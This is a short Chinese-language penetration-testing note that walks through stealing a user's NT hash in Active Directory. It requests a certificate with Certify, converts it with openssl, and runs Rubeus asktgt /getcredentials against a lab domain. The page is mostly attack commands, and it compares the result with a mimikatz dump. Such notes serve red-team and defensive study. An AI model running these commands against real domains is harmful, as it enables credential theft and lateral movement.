通过证书检索NTHash

使用证书请求票证(需要应用程序策略为可以身份验证的)，并使用/getcredentials在PAC中检索NT哈希

申请证书

Certify.exe request /ca:dc.fbi.gov\fbi-DC-CA /template:NTHash

将含有公私钥的pem证书整个复制到kali中使用openssl进行格式转化

/usr/bin/openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

在这里输入密码

Rubeus.exe asktgt /getcredentials /user:"test2" /certificate:"cert.pfx" /password:"123456" /domain:"fbi.gov" /dc:"dc.fbi.gov" /show
# user是请求证书的用户，cert.pfx是刚刚在kali机器里转化得到的证书，密码是上面输入的密码

和mimikatz抓取得到的hash是一样的

PreviousDACL滥用On_User&DCSync Next奇葩的问题

Last updated 2 years ago